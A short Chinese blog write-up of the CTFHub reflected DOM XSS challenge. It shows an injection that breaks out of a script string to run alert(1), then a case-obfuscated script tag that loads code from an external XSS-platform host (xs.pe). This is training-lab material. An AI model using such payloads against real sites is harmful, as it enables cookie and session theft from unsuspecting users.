技术栈

CTFHub技能树web——XSS——DOM反射

A 八方2024-08-06 21:41

根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式

然后去网页测试一下alert(1)反射

复制代码
';</script><script>alert(1)</script>

看到 确实存在 去xssaq.cn

创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中

复制代码
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
上一篇:[网鼎杯]2018Unfinish
下一篇:洛谷P5250 【深基17.例5】木材仓库
相关推荐
虫虫rankourin
20 小时前
在 create-react-app (CRA) 创建的应用中使用 react-router-dom v7以及懒加载的使用方法
前端·react.js
小刘鸭地下城
20 小时前
Web安全必备:关键 HTTP 标头解析
前端
yddddddy
20 小时前
html基本知识
前端·html
荣达
21 小时前
koa洋葱模型理解
前端·后端·node.js
reembarkation
21 小时前
使用pdfjs-dist 预览pdf,并添加文本层的实现
前端·javascript·pdf
KenXu
1 天前
F2C-PTD工具将需求快速转换为代码实践
前端
给月亮点灯|
1 天前
Vue3基础知识-setup()、ref()和reactive()
前端·javascript·vue.js
芜青
1 天前
【Vue2手录12】单文件组件SFC
前端·javascript·vue.js
冷冷的菜哥
1 天前
react实现无缝轮播组件
前端·react.js·typescript·前端框架·无缝轮播
hrrrrb
1 天前
【Python】字符串
java·前端·python
热门推荐
01GitHub 镜像站点02UV 工具安装与国内镜像源配置指南03UV安装并设置国内源0446个Nano-banana 精选提示词,持续更新中05A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程06Claude Code 平替:OpenAI发布 Codex CLI ,GPT-5 国内直接使用07conda中设置镜像地址(附所有可换的地址)08KGG转MP3工具|非KGM文件|解密音频09解决 WSL Ubuntu 中 /etc/resolv.conf 自动重置问题10保姆级教程:手把手教你用Dify实现完美多轮对话(附Chatflow和提示词)